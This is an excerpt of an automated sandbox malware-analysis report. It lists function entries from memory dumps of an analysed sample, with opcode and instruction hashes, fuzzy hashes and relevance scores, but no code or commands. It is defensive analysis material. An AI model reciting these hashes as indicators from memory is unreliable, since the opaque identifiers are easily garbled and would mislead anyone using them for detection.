                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fffd548cc0182e234e4834870aa0b1ecbfe1a87068afec74adb283bf32cebe2
                                                  • Instruction ID: b6ce82310fbf2e5419d61be99cac4e1ab7506254c43e4a052fc9ac60eeea84a9
                                                  • Opcode Fuzzy Hash: 6fffd548cc0182e234e4834870aa0b1ecbfe1a87068afec74adb283bf32cebe2
                                                  • Instruction Fuzzy Hash: C6915D75D00254CFDB14AFA0D95C7EEBBB6EB4A306F10541AD1027B2E8CB785A88CF59
                                                  Function 00942B00 Relevance: .2, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8de33e027c2ac98857e54dd5eddc78c7501c7489dddc1316bf457aca2e2f01c5
                                                  • Instruction ID: 0e6f6ea724b7ee13d15ab7ad34f4684b466a74f06546e48ade863eda29d2b0ce
                                                  • Opcode Fuzzy Hash: 8de33e027c2ac98857e54dd5eddc78c7501c7489dddc1316bf457aca2e2f01c5
                                                  • Instruction Fuzzy Hash: 8FB19774E00218CFDB54DFA9D884A9DBBF2FF89314F2581A9D819AB365DB30A941CF50
                                                  Function 001C6D5A Relevance: .2, Instructions: 193COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 829c9b9cccbb6180a95c5143b90ecba9e66f138f11fb91441b0e17f962a05f9f
                                                  • Instruction ID: 1ab66bc4b78cb77893c96ff91b37615d519b570ab9922f6db0beb372452b39e2
                                                  • Opcode Fuzzy Hash: 829c9b9cccbb6180a95c5143b90ecba9e66f138f11fb91441b0e17f962a05f9f
                                                  • Instruction Fuzzy Hash: B9A19E74A01228CFDB64DF24D894BAEBBB2BB4A304F5085EAD50DA7350DB319E81CF51
                                                  Function 00942AF9 Relevance: .1, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.907170700.0000000000940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_940000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9e13eb2f229705892f17c16c93667bed21eff2fff8fce6f787dbcb67a321311
                                                  • Instruction ID: 2cd2a1ff8177b4d9bd87877502df4e2de2cdc27f9163741e0da1355348966739
                                                  • Opcode Fuzzy Hash: d9e13eb2f229705892f17c16c93667bed21eff2fff8fce6f787dbcb67a321311
                                                  • Instruction Fuzzy Hash: 7C518574E00648CFDB08DFAAD584A9DBBF2FF89310F248169E419AB364DB349942CF55
                                                  Function 001C6F39 Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.906928230.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_1c0000_ncfplgpeter20306.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1904f358d45c86deb6b51ab7f93eb3442139a5e813df33cca1df203a66d4c6ba
                                                  • Instruction ID: c111850dcb31c550afa2286c21aec980ec5bd4b43ef626dab37f80d5f7085d55
                                                  • Opcode Fuzzy Hash: 1904f358d45c86deb6b51ab7f93eb3442139a5e813df33cca1df203a66d4c6ba
                                                  • Instruction Fuzzy Hash: 1E519634A05228CFCB65DF24D894B9DB7B2BF4A305F5085EAD509A7350DB71AE81CF50